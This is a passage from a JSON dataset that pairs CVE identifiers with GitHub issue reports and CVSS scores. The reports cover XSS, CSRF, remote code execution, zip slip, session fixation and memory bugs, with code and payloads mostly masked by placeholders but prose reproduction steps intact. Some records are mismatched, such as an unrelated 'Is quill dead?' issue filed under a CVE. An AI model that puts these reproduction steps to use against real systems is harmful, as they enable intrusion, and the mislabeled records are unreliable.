  66383. "Issue_Url_new": "https://github.com/quilljs/quill/issues/3273",
  66384. "Repo_new": "quilljs/quill",
  66385. "Issue_Created_At": "2021-01-14T22:05:36Z",
  66386. "description": "Stored XSS in the Quill JS editor. Please describe the a concise description and fill out the details below. It will help others efficiently understand your request and get to an answer instead of repeated back and forth. Providing a minimal, complete and verifiable example URLTAG will further increase your chances that someone can help. Steps for Reproduction NUMBERTAG isit a page with the XSS scripting payload stored by an attacker (is there a more secure channel for reporting security bugs NUMBERTAG The payload executes Expected behavior : No XSS, no arbitrary Javascript execution Actual behavior : attackers can execute arbitrary Javascript Platforms : most browsers Include browser, operating system and respective versions firefox, windows NUMBERTAG ersion : Run APITAG to find out",
  66387. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  66388. "severity": "MEDIUM",
  66389. "baseScore": 6.1,
  66390. "impactScore": 2.7,
  66391. "exploitabilityScore": 2.8
  66392. },
  66393. {
  66394. "CVE_ID": "CVE-2021-3163",
  66395. "Issue_Url_old": "https://github.com/quilljs/quill/issues/3359",
  66396. "Issue_Url_new": "https://github.com/quilljs/quill/issues/3359",
  66397. "Repo_new": "quilljs/quill",
  66398. "Issue_Created_At": "2021-05-04T07:56:06Z",
  66399. "description": "Is quill dead?. No updates. Version NUMBERTAG still on development mode. No commits. Is it dead?",
  66400. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  66401. "severity": "MEDIUM",
  66402. "baseScore": 6.1,
  66403. "impactScore": 2.7,
  66404. "exploitabilityScore": 2.8
  66405. },
  66406. {
  66407. "CVE_ID": "CVE-2021-3163",
  66408. "Issue_Url_old": "https://github.com/quilljs/quill/issues/3364",
  66409. "Issue_Url_new": "https://github.com/quilljs/quill/issues/3364",
  66410. "Repo_new": "quilljs/quill",
  66411. "Issue_Created_At": "2021-05-11T14:34:05Z",
  66412. "description": "Security Issue CVETAG . Hi. I would like to raise a security issue which is described in CVETAG . Is there any fix for that or do someone know an ETA when that security issue will be fixed? Thanks in advance.",
  66413. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  66414. "severity": "MEDIUM",
  66415. "baseScore": 6.1,
  66416. "impactScore": 2.7,
  66417. "exploitabilityScore": 2.8
  66418. },
  66419. {
  66420. "CVE_ID": "CVE-2021-31663",
  66421. "Issue_Url_old": "https://github.com/RIOT-OS/RIOT/issues/15927",
  66422. "Issue_Url_new": "https://github.com/riot-os/riot/issues/15927",
  66423. "Repo_new": "riot-os/riot",
  66424. "Issue_Created_At": "2021-02-04T13:54:14Z",
  66425. "description": "uri_parser: out of bounds read. Description I did some testing of the APITAG module as provided in APITAG . I believe I discovered an edge case where the parser performs an out of bounds read of the provided buffer. The code causing this is: URLTAG which advances APITAG without a bounds check and even if APITAG is zero APITAG is still advanced by one byte. Steps to reproduce the issue Application code: CODETAG Minimal Makefile : CODETAG Afterwards, compile as: $ make C examples/uri all asan And run the application using: $ make C examples/uri term Expected results The application shouldn't crash. Actual results ERRORTAG Versions I don't think this is needed, if you need more information let me know.",
  66426. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  66427. "severity": "HIGH",
  66428. "baseScore": 7.5,
  66429. "impactScore": 3.6,
  66430. "exploitabilityScore": 3.9
  66431. },
  66432. {
  66433. "CVE_ID": "CVE-2021-31671",
  66434. "Issue_Url_old": "https://github.com/ankane/pgsync/issues/121",
  66435. "Issue_Url_new": "https://github.com/ankane/pgsync/issues/121",
  66436. "Repo_new": "ankane/pgsync",
  66437. "Issue_Created_At": "2021-04-26T22:09:39Z",
  66438. "description": "Connection security vulnerability with schema sync. CVE Identifier: CVETAG Versions Affected NUMBERTAG and below Fixed Versions NUMBERTAG Impact pgsync drops connection parameters when syncing the schema with the APITAG and APITAG options. Some of these parameters may affect security. For instance, if sslmode is dropped, the connection may not use SSL. The first connection parameter is not affected. Here's an example where sslmode is dropped ( APITAG is not affected): APITAG This applies to both the to and from connections. All users running an affected release should upgrade immediately. Credits Thanks to Dmitriy Gunchenko for reporting this.",
  66439. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  66440. "severity": "HIGH",
  66441. "baseScore": 7.5,
  66442. "impactScore": 3.6,
  66443. "exploitabilityScore": 3.9
  66444. },
  66445. {
  66446. "CVE_ID": "CVE-2021-31676",
  66447. "Issue_Url_old": "https://github.com/lazyphp/PESCMS-TEAM/issues/7",
  66448. "Issue_Url_new": "https://github.com/lazyphp/pescms-team/issues/7",
  66449. "Repo_new": "lazyphp/pescms-team",
  66450. "Issue_Created_At": "2021-04-19T09:20:03Z",
  66451. "description": "There are some vulnerabilities in cms.. Cross Site Request Forgery(CSRF NUMBERTAG modify admin's password ,mail,phone and head image. Technical Description: file : APITAG The function of this file is to Modify personal information,but it don't Verify whether the operation is legal. Through it attackers can modify admin's password ,mail,phone and head image. Proof of APITAG CODETAG FILETAG APITAG the password of admin has been modify. FILETAG Cross Site Request Forgery(CSRF NUMBERTAG Delete the administrator and other member's account number Technical Description: file: APITAG Throught it can delete Any member and administrator just by modify the 'id' that in Url. Delete the Account number of administrator just need to modify the id as NUMBERTAG FILETAG Proof of APITAG CODETAG Visit this page of poc: FILETAG FILETAG We refresh the list of user ,that find that the user that called light is deleted. FILETAG Cross Site Request Forgery(CSRF NUMBERTAG Delete import information Technical Description: file: CODETAG Through CSRF to Delete important data is exist in these files. ALL the delete operations are not verify in front page. Like this: FILETAG Proof of APITAG CODETAG FILETAG refresh: FILETAG And other operations of delete are exist on this cms. Just give the positions,don't prove. FILETAG FILETAG Reflected XSS in PATHTAG In the method of extract, the CSRF also exist , but this is to prove the Rdflected XSS,not CSRF. In line NUMBERTAG the data from $_GET('begin') and $_GET('end') is transfer to variables, and output in pages. FILETAG Proof of APITAG CODETAG FILETAG In this page APITAG XSS can be combined with CSRF,this will cause bigger destruction",
  66452. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  66453. "severity": "MEDIUM",
  66454. "baseScore": 6.1,
  66455. "impactScore": 2.7,
  66456. "exploitabilityScore": 2.8
  66457. },
  66458. {
  66459. "CVE_ID": "CVE-2021-31684",
  66460. "Issue_Url_old": "https://github.com/netplex/json-smart-v1/issues/10",
  66461. "Issue_Url_new": "https://github.com/netplex/json-smart-v1/issues/10",
  66462. "Repo_new": "netplex/json-smart-v1",
  66463. "Issue_Created_At": "2021-04-16T03:02:06Z",
  66464. "description": "ERRORTAG in parser. The parser fails to throw the ERRORTAG when the parser read the APITAG , the following example input could cause the ERRORTAG APITAG In detail, when the parser tries to find closed single quotation mark using APITAG function, the iteration variable is not sets corretly in line NUMBERTAG URLTAG It shouldn't be the pos to be checked less than len . Instead, the i should be checked. The correct way in line NUMBERTAG is: APITAG Any input with unclosed single quotation mark could trigger this. Like the input of APITAG , cause the ERRORTAG ERRORTAG",
  66465. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  66466. "severity": "HIGH",
  66467. "baseScore": 7.5,
  66468. "impactScore": 3.6,
  66469. "exploitabilityScore": 3.9
  66470. },
  66471. {
  66472. "CVE_ID": "CVE-2021-31684",
  66473. "Issue_Url_old": "https://github.com/netplex/json-smart-v2/issues/67",
  66474. "Issue_Url_new": "https://github.com/netplex/json-smart-v2/issues/67",
  66475. "Repo_new": "netplex/json-smart-v2",
  66476. "Issue_Created_At": "2021-04-16T03:21:57Z",
  66477. "description": "ERRORTAG in parser. Same as URLTAG The code base is at URLTAG It shouldn't be the pos to be checked less than len . Instead, the i should be checked. The correct way in line NUMBERTAG is: APITAG Any input with unclosed single quotation mark could trigger this. Like the input of APITAG , cause the ERRORTAG ERRORTAG",
  66478. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  66479. "severity": "HIGH",
  66480. "baseScore": 7.5,
  66481. "impactScore": 3.6,
  66482. "exploitabilityScore": 3.9
  66483. },
  66484. {
  66485. "CVE_ID": "CVE-2021-31712",
  66486. "Issue_Url_old": "https://github.com/jpuri/react-draft-wysiwyg/issues/1102",
  66487. "Issue_Url_new": "https://github.com/jpuri/react-draft-wysiwyg/issues/1102",
  66488. "Repo_new": "jpuri/react-draft-wysiwyg",
  66489. "Issue_Created_At": "2021-04-14T08:10:28Z",
  66490. "description": "XSS via Link Target. The APITAG library is not filtering the APITAG prefix. XSS can be triggered when someone clicks the link on the draft. This vulnerability can be exploited in a scenario where the draft is shared among different users (such as in a blog/content dashboard). Steps to reproduce NUMBERTAG On URLTAG insert a link NUMBERTAG Set APITAG as Link Target NUMBERTAG Hover the link and click the icon to open the link NUMBERTAG You can see the APITAG is executed under the context of APITAG . Expectation If the link starts with APITAG , don't open it. You can try another rich text editor such as URLTAG for reference. The XSS itself is triggered because of this line URLTAG ( APITAG ). The url should be validated before it reaches that line.",
  66491. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  66492. "severity": "MEDIUM",
  66493. "baseScore": 5.4,
  66494. "impactScore": 2.7,
  66495. "exploitabilityScore": 2.3
  66496. },
  66497. {
  66498. "CVE_ID": "CVE-2021-31731",
  66499. "Issue_Url_old": "https://github.com/Kitesky/KiteCMS/issues/9",
  66500. "Issue_Url_new": "https://github.com/kitesky/kitecms/issues/9",
  66501. "Repo_new": "kitesky/kitecms",
  66502. "Issue_Created_At": "2021-04-21T07:11:29Z",
  66503. "description": "Code execution vulnerability causes RCE NUMBERTAG log into the background of the site url: PATHTAG NUMBERTAG Add vulnerability URL url: PATHTAG Convert to a POST request FILETAG let contract FILETAG NUMBERTAG Access FILETAG generated in the root directory url: APITAG FILETAG Code audit The vulnerability file is located at: PATHTAG > APITAG FILETAG $path and $html We controlled,$rootpath Path splicing And the PATH variable can be passed through .. / directory The variable HTML is written to our PHP code The HTML is decoded, but it has no effect on the PHP code So we can find an existing file to overwrite the writing. POST payload is: PATHTAG APITAG Finally, the command is executed at index.PHP",
  66504. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
  66505. "severity": "MEDIUM",
  66506. "baseScore": 6.5,
  66507. "impactScore": 5.2,
  66508. "exploitabilityScore": 1.2
  66509. },
  66510. {
  66511. "CVE_ID": "CVE-2021-31737",
  66512. "Issue_Url_old": "https://github.com/emlog/emlog/issues/82",
  66513. "Issue_Url_new": "https://github.com/emlog/emlog/issues/82",
  66514. "Repo_new": "emlog/emlog",
  66515. "Issue_Created_At": "2021-04-22T09:19:20Z",
  66516. "description": "Remote code execution vulnerability due to upload of database backup file in emlog NUMBERTAG emlog NUMBERTAG The vulnerable file is in \uff1a FILETAG FILETAG Whether version NUMBERTAG or version NUMBERTAG users can back up SQL database in the background FILETAG FILETAG At the same time, users can upload after modifying the database backup file, at this time, we can construct malicious SQL statements in the data to achieve the purpose of writing the shell file FILETAG FILETAG We access the generated specified malicious files to execute the code FILETAG Tested for this bug in both versions",
  66517. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  66518. "severity": "CRITICAL",
  66519. "baseScore": 9.8,
  66520. "impactScore": 5.9,
  66521. "exploitabilityScore": 3.9
  66522. },
  66523. {
  66524. "CVE_ID": "CVE-2021-31745",
  66525. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/99",
  66526. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/99",
  66527. "Repo_new": "pluck-cms/pluck",
  66528. "Issue_Created_At": "2021-04-21T03:45:08Z",
  66529. "description": "Pluck NUMBERTAG Session Fixation Vulnerability. Issue Summary A session fixation vulnerability exists within Pluck's administrative login system which can be abused to retain a valid login session even after an administrator has changed their password. Detailed Description It is possible to arbitrarily set the session ID of Pluck's \"PHPSESSID\" cookie. This cookie is used for maintaining administrative login sessions. This can be used in a session fixation attack, for example, to sustain unauthorized access to the CMS after already gaining it through a primary vulnerability. Furthermore, Pluck does not expire sessions in a timely manner nor are sessions bound in any other way. This also allows an easier brute force attack, as it is possible to brute force session IDs without rate limits imposed by the normal login process. APITAG Reproduction Steps NUMBERTAG From Google Chrome, open the developer tools menu, navigate to: Application > Storage > Cookies > APITAG NUMBERTAG Change the value of the \"PHPSESSID\" cookkie to an arbitrary value, such as \"wolf NUMBERTAG Login to the pluck administrative panel, by visiting FILETAG and login to the panel NUMBERTAG On a new browser, repeat steps NUMBERTAG and NUMBERTAG On step NUMBERTAG you will be given access without being prompted for administrative credentials. Impact After any primary exploit has occurred, the session fixation attack can be used in order to sustained unauthorized access. Because Pluck does not invalidate prior sessions after a password change, access can be sustained even after an administrator performs regular remediation attempts such as resetting their password.",
  66530. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  66531. "severity": "HIGH",
  66532. "baseScore": 7.5,
  66533. "impactScore": 3.6,
  66534. "exploitabilityScore": 3.9
  66535. },
  66536. {
  66537. "CVE_ID": "CVE-2021-31746",
  66538. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/100",
  66539. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/100",
  66540. "Repo_new": "pluck-cms/pluck",
  66541. "Issue_Created_At": "2021-04-21T04:09:29Z",
  66542. "description": "Pluck NUMBERTAG Zip Slip Vulnerability. Issue Summary Pluck's module and theme installers are vulnerable to directory traversal (via zip slip). Detailed Description It is possible to upload a malicious zip file in order to traverse directories outside of the intended environment, potentially allowing arbitrary code execution which will run with the permissions of the user assigned to the webserver. Reproduction Steps NUMBERTAG Using the evilarc tool URLTAG , create a zip archive containing a PHP file with a depth of NUMBERTAG APITAG NUMBERTAG isit APITAG and upload the malicious APITAG you created NUMBERTAG isit APITAG and you now have a PHP shell. Impact This vulnerability makes remote code execution under the privileges of the user running the webserver application possible.",
  66543. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  66544. "severity": "CRITICAL",
  66545. "baseScore": 9.8,
  66546. "impactScore": 5.9,
  66547. "exploitabilityScore": 3.9
  66548. },
  66549. {
  66550. "CVE_ID": "CVE-2021-31747",
  66551. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/101",
  66552. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/101",
  66553. "Repo_new": "pluck-cms/pluck",
  66554. "Issue_Created_At": "2021-04-21T17:59:48Z",
  66555. "description": "Missing SSL Certificate Validation in FILETAG . Issue Summary Pluck's update system deliberately skips SSL certificate validation. Detailed Description Within FILETAG is the following code: APITAG This ensures peer SSL certificates are never valdiated. Impact In theory, this vulnerability can make the Pluck's update system susceptible to Man in the middle attacks.",
  66556. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
  66557. "severity": "MEDIUM",
  66558. "baseScore": 4.8,
  66559. "impactScore": 2.5,
  66560. "exploitabilityScore": 2.2
  66561. },
  66562. {
  66563. "CVE_ID": "CVE-2021-31783",
  66564. "Issue_Url_old": "https://github.com/Piwigo/LocalFilesEditor/issues/2",
  66565. "Issue_Url_new": "https://github.com/piwigo/localfileseditor/issues/2",
  66566. "Repo_new": "piwigo/localfileseditor",
  66567. "Issue_Created_At": "2021-04-23T13:18:54Z",
  66568. "description": "template files display may be used to display external files. Privately reported by Harry Goodman from NCC The APITAG can be used to display unexpected file on the hosting server. We need to make serious checks before any other action.",
  66569. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  66570. "severity": "HIGH",
  66571. "baseScore": 7.5,
  66572. "impactScore": 3.6,
  66573. "exploitabilityScore": 3.9
  66574. },
  66575. {
  66576. "CVE_ID": "CVE-2021-31804",
  66577. "Issue_Url_old": "https://github.com/leozide/leocad/issues/645",
  66578. "Issue_Url_new": "https://github.com/leozide/leocad/issues/645",
  66579. "Repo_new": "leozide/leocad",
  66580. "Issue_Created_At": "2021-03-08T04:40:59Z",
  66581. "description": "Use after free when opening a new document. Describe the bug This only happen if APITAG reopen the last document. This need leocad compiled with address sanitizer. Rough patch: CODETAG To Reproduce Steps to reproduce the behavior NUMBERTAG Start leocad with the last document reopened NUMBERTAG File > New NUMBERTAG Crash Expected behavior Shouldn't crash Stack trace ERRORTAG Version (please complete the following information): OS: Linux Fedora NUMBERTAG APITAG Version: git master commit APITAG",
  66582. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66583. "severity": "MEDIUM",
  66584. "baseScore": 5.5,
  66585. "impactScore": 3.6,
  66586. "exploitabilityScore": 1.8
  66587. },
  66588. {
  66589. "CVE_ID": "CVE-2021-31926",
  66590. "Issue_Url_old": "https://github.com/CubeCoders/AMP/issues/443",
  66591. "Issue_Url_new": "https://github.com/cubecoders/amp/issues/443",
  66592. "Repo_new": "cubecoders/amp",
  66593. "Issue_Created_At": "2021-04-24T12:42:45Z",
  66594. "description": "Can add custom ports without permission. Bug Report System Information Operating System NUMBERTAG amd NUMBERTAG SMP Debian NUMBERTAG APITAG AMP version and build date NUMBERTAG built PATHTAG NUMBERTAG Which AMP release stream you're using Mainline I confirm: FILETAG NUMBERTAG Created a Test user with the following permissions (the user is not member of any group) FILETAG NUMBERTAG Login with a super admin and check the instance ports FILETAG NUMBERTAG Login with the Test user, click on the Minecraft Instance and then APITAG ports\" FILETAG NUMBERTAG Click on the \"+\" in the dialog and then APITAG NUMBERTAG Check again the ports with the super admin FILETAG NUMBERTAG A new port has been added On the step NUMBERTAG if I do APITAG changes\" it will give me this error FILETAG",
  66595. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  66596. "severity": "MEDIUM",
  66597. "baseScore": 6.5,
  66598. "impactScore": 3.6,
  66599. "exploitabilityScore": 2.8
  66600. },
  66601. {
  66602. "CVE_ID": "CVE-2021-3195",
  66603. "Issue_Url_old": "https://github.com/bitcoin/bitcoin/issues/20866",
  66604. "Issue_Url_new": "https://github.com/bitcoin/bitcoin/issues/20866",
  66605. "Repo_new": "bitcoin/bitcoin",
  66606. "Issue_Created_At": "2021-01-06T10:39:23Z",
  66607. "description": "Restrict RPCs that make server side files. Currently dumpwallet and other RPCs can scribble all over the file system, at least as the user running bitcoind permits. It would be better if these were at the least limited to the data directory, or even a specific directory within the data directory, say, APITAG \u2014to avoid name collisions with wallets, lock files and database files. Overwriting is already prevented.",
  66608. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  66609. "severity": "HIGH",
  66610. "baseScore": 7.5,
  66611. "impactScore": 3.6,
  66612. "exploitabilityScore": 3.9
  66613. },
  66614. {
  66615. "CVE_ID": "CVE-2021-3200",
  66616. "Issue_Url_old": "https://github.com/openSUSE/libsolv/issues/416",
  66617. "Issue_Url_new": "https://github.com/opensuse/libsolv/issues/416",
  66618. "Repo_new": "opensuse/libsolv",
  66619. "Issue_Created_At": "2020-12-13T05:52:11Z",
  66620. "description": "libsolv \u201ctestcase_read\u201d function a heap overflow vulnerability. Description: There is a heap overflow bug in function: Solver APITAG pool, FILE fp, const char testcase, Queue job, char resultp, int resultflagsp) at src/testcase.c: line NUMBERTAG APITAG The libsolv defines MAPCLR(m, n) as following: APITAG , which means that MAPCLR(pool >considered, p) is same as APITAG The type of variable \u201cpool >considered\u201d is a Map structure. The definition of the structure Map as following: ERRORTAG If the value of the index variable \u201cp NUMBERTAG is bigger than pool >considered >size, there will be a heap buffer overflow bug. Our APITAG file can trigger this bug. Please reproduce this issue through the following APITAG PATHTAG APITAG testcase_read NUMBERTAG URLTAG If you configure CC with flag fsanitize=address, you will get the following outputs: disable: unknown package 'A NUMBERTAG noarch APITAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG d1 at pc NUMBERTAG f NUMBERTAG a NUMBERTAG b NUMBERTAG e bp NUMBERTAG ffffc NUMBERTAG sp NUMBERTAG ffffc NUMBERTAG READ of size NUMBERTAG at NUMBERTAG d1 thread T NUMBERTAG f NUMBERTAG a NUMBERTAG b NUMBERTAG d in testcase_read PATHTAG NUMBERTAG f NUMBERTAG b in main PATHTAG NUMBERTAG f NUMBERTAG fa8abf6 in __libc_start_main PATHTAG NUMBERTAG e6f9 in _start ( PATHTAG NUMBERTAG d1 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG abe NUMBERTAG in calloc PATHTAG NUMBERTAG f NUMBERTAG be7f NUMBERTAG in solv_calloc PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG dba in map_init PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG a in testcase_read PATHTAG NUMBERTAG f NUMBERTAG b in main PATHTAG NUMBERTAG f NUMBERTAG fa8abf6 in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in testcase_read Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING The ASAN outputs information about this overflow bug. And attacker can use this bug to achieve a APITAG attack. Please reproduce and fix this bug.",
  66621. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
  66622. "severity": "LOW",
  66623. "baseScore": 3.3,
  66624. "impactScore": 1.4,
  66625. "exploitabilityScore": 1.8
  66626. },
  66627. {
  66628. "CVE_ID": "CVE-2021-32053",
  66629. "Issue_Url_old": "https://github.com/hapifhir/hapi-fhir/issues/2641",
  66630. "Issue_Url_new": "https://github.com/hapifhir/hapi-fhir/issues/2641",
  66631. "Repo_new": "hapifhir/hapi-fhir",
  66632. "Issue_Created_At": "2021-05-06T14:26:38Z",
  66633. "description": "Potential Denial of Service in JPA Server via history operation. A weakness in our handling of FHIR history URLTAG operations has been reported. Specifically, on a server with a very large number of resources, if the history operation is executed by many clients (e.g NUMBERTAG concurrently, the server becomes unresponsive and ultimately consumes a large amount of disk and becomes unstable. Our investigation has revealed that the root cause is a APITAG query that executes at the start of all APITAG operations. Essentially, anytime a APITAG is executed, the server executes NUMBERTAG SQL statements (statements here are approximate NUMBERTAG A APITAG is performed to supply a value for ERRORTAG NUMBERTAG A APITAG is performed to supply the contents The second query is executed against an index and is very fast. The first query by its nature requires a full index scan and is slow. Executing it NUMBERTAG concurrent times quickly overwhelms the database and leads to timeouts, exceptions, and eventually instability. The proposed fix is as follows: A new APITAG setting is added. This setting introduces a \"history count mode\" with NUMBERTAG options: Cached. This is the new default: A loading cache will be used for history counts, meaning that counts are stored in RAM for up to one minute, and the loading cache blocks all but one client thread per JVM from actually performing the count. This effectively throttles access to the database. Not cached. This is the status quo and does exhibit the weakness described here, but may be appropriate in scenarios where users are trusted and accuracy is always required. No count. This setting avoids the count query entirely, saving time and avoiding this weakness at the expense of not including any total in the response. A huge thanks to Zachary Minneker at Security Innovation who discovered and submitted a responsible disclosure of this issue. This issue will be resolved for the upcoming NUMBERTAG release. A CVE number is forthcoming.",
  66634. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  66635. "severity": "MEDIUM",
  66636. "baseScore": 5.3,
  66637. "impactScore": 1.4,
  66638. "exploitabilityScore": 3.9
  66639. },
  66640. {
  66641. "CVE_ID": "CVE-2021-32061",
  66642. "Issue_Url_old": "https://github.com/sa7mon/S3Scanner/issues/122",
  66643. "Issue_Url_new": "https://github.com/sa7mon/s3scanner/issues/122",
  66644. "Repo_new": "sa7mon/s3scanner",
  66645. "Issue_Created_At": "2021-11-28T21:06:52Z",
  66646. "description": "CVETAG : Path Traversal via dump of malicious bucket. tl;dr In version NUMBERTAG and older of APITAG if a user attempts to dump the contents of a bucket which contains objects with special characters in their keys, those characters can be used to save the files outside of the folder specified with APITAG . Thanks I'd like to give a huge thanks to a security researcher named APITAG URLTAG for reporting this issue to me. They provided a detailed explanation and helped walk me through the steps to reproduce. Very excellent experience. The Bug The issue is what's commonly known as a \"path traversal\" vulnerability. In this case, though, it's the ability to save files outside the intended area as opposed to reading files. For example: this bucket was created by APITAG for demonstration purposes. APITAG See how the object keys contain APITAG ? When APITAG goes to download that file, it concatenates the dump directory and this key to form the file path the file should get downloaded to. So if a user ran the following command: APITAG they would end up with a file called APITAG in APITAG which is one level up from where they wanted it. By adding a bunch of these characters together ( APITAG ) an attacker could craft a malicious object key which would place their file anywhere on the APITAG user's system. You may be surprised (like I was) to learn that AWS allows such characters in object keys. Their documentation FILETAG that while you can do this, there are limitations: > ... > > In addition, be aware of the following prefix limitations: > > Objects with a prefix of \"./\" must uploaded or downloaded with the AWS Command Line Interface (AWS CLI), AWS SDKs, or REST API. You cannot use the Amazon S3 console. > > Objects with a prefix of \"../\" cannot be uploaded using the AWS Command Line Interface (AWS CLI) or Amazon S3 console. In the \"real world\" the chances of an APITAG user encountering a bucket with these \"malicious\" keys is very low especially considering I was not able to create such a bucket of my own. This threat poses a fairly low risk since the difficulty of pulling off the attack is a bit high and would only happen if a bad actor was purposely targeting users of this tool. APITAG has engaged MITRE who has reserved CVETAG CVETAG for this vulnerability. The CVE will be updated after this advisory has been posted. Remediation The good news is that I have already pushed the fix for this issue NUMBERTAG If an object to be downloaded has a key that would land outside of the APITAG , the file won't be downloaded. The user will get a message that looks like this: APITAG I'll be drafting the NUMBERTAG release to push out this update across the git repo, APITAG package, and Docker image.",
  66647. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  66648. "severity": "MEDIUM",
  66649. "baseScore": 5.3,
  66650. "impactScore": 1.4,
  66651. "exploitabilityScore": 3.9
  66652. },
  66653. {
  66654. "CVE_ID": "CVE-2021-32074",
  66655. "Issue_Url_old": "https://github.com/hashicorp/vault-action/issues/205",
  66656. "Issue_Url_new": "https://github.com/hashicorp/vault-action/issues/205",
  66657. "Repo_new": "hashicorp/vault-action",
  66658. "Issue_Created_At": "2021-04-20T17:51:47Z",
  66659. "description": "Exposes secrets in plaintext. When using NUMBERTAG actions output secrets in plaintext, here's an example pipeline output APITAG pipeline itself CODETAG",
  66660. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  66661. "severity": "HIGH",
  66662. "baseScore": 7.5,
  66663. "impactScore": 3.6,
  66664. "exploitabilityScore": 3.9
  66665. },
  66666. {
  66667. "CVE_ID": "CVE-2021-3210",
  66668. "Issue_Url_old": "https://github.com/BloodHoundAD/BloodHound/issues/338",
  66669. "Issue_Url_new": "https://github.com/bloodhoundad/bloodhound/issues/338",
  66670. "Repo_new": "bloodhoundad/bloodhound",
  66671. "Issue_Created_At": "2020-06-21T16:20:56Z",
  66672. "description": "XSS in APITAG leading to RCE via imported malicious data file. The help text modal utilizes the React component attribute APITAG when rendering the Info , Abuse Info , etc. texts. E.g. URLTAG This makes the application vulnerable to XSS unless the input parameters are properly sanitized/encoded. It turns out that the parameter APITAG (objectid) isn't encoded, and is reflected in multiple Abuse Info texts making the application vulnerable. URLTAG Since Bloodhound is built using Electron, it is possible to spawn child processes from an XSS vector leading to a RCE vulnerability. By getting the victim to import a malicious data graph file and clicking Help on an edge connected to a malicious node, the XSS payload will trigger. To mitigate this, encoding objectid the same way the node labels are encoded should do the trick. APITAG APITAG I've attached a zip, FILETAG , containing a malicious file, APITAG . APITAG may need to unzip and manually import the JSON file NUMBERTAG Import the file APITAG into APITAG NUMBERTAG Click Help on the edge between APITAG and APITAG NUMBERTAG This should pop APITAG FILETAG",
  66673. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  66674. "severity": "CRITICAL",
  66675. "baseScore": 9.6,
  66676. "impactScore": 6.0,
  66677. "exploitabilityScore": 2.8
  66678. },
  66679. {
  66680. "CVE_ID": "CVE-2021-32132",
  66681. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1753",
  66682. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1753",
  66683. "Repo_new": "gpac/gpac",
